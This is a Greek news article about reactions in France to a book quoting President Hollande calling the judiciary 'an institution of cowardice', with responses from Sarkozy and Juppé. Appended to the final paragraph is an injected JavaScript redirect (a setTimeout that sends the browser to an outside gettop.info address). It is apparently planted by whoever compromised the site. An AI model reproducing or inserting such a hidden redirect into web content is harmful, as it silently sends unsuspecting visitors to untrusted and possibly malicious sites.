Θύελλα στη Γαλλία με το βιβλίο για τις αποκαλύψεις Ολάντ

0
19

 

Οι εκρηκτικές εκμυστηρεύσεις του Φρανσουά Ολάντ, έξι μήνες πριν από τις προεδρικές εκλογές, έχουν ξεσηκώσει θύελλα αντιδράσεων. Ο πρόεδρος της Γαλλίας φέρεται να επικρίνει την Δικαιοσύνη «ως έναν θεσμό δειλίας» και να θεωρεί ότι οι ποδοσφαιριστές της εθνικής ομάδας της χώρας του χρειάζονται «μποντιμπίλντινγκ στον εγκέφαλο».

Σto βιβλίο-εξομολόγηση, με τον τίτλο «Ένας πρόεδρος δεν έπρεπε να το πει αυτό…» («Un président ne devrait pas dire ça…»), που έγραψαν δυο δημοσιογράφοι της Le Monde βασιζόμενοι σε συζητήσεις που είχαν με τον Γάλλο ηγέτη και κυκλοφόρησε χθες, ο Φρανσουά Ολάντ  φέρεται να λέει:

«Αυτός ο θεσμός, είναι ένας θεσμός δειλίας… Διότι αυτό που συμβαίνει είναι ότι όλοι αυτοί οι εισαγγελείς, όλοι αυτοί οι ανώτεροι δικαστές κρύβονται, παριστάνουν τους ενάρετους… Δεν αγαπούν την πολιτική. Η Δικαιοσύνη δεν αγαπά την Πολιτική…».

 

Ο Γάλος πρόεδρος, προσπαθώντας να διασκεδάσει τις αρνητικές εντυπώσεις, δήλωσε ότι λυπάται και πως όσα γράφουν οι δημοσιογράφοι δεν απηχούν τις σκέψεις του.

Ο πρώην πρόεδρος της χώρας Νικολά Σαρκοζί δήλωσε πως, όταν βρίζεις τους δικαστές, σίγουρα ισοπεδώνεις το προεδρικό αξίωμα.

Αλλά και ο Αλάν Ζιπέ, ο επικρατέστερος της Δεξιάς για τις προεδρικές εκλογές, τόνισε πως ο πρόεδρος «αθετεί σε μεγάλο βαθμό τα καθήκοντα του λειτουργήματός του και αποδεικνύει για μία ακόμη φορά ότι δεν μπορεί να σταθεί στο ύψος του αξιώματός του». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here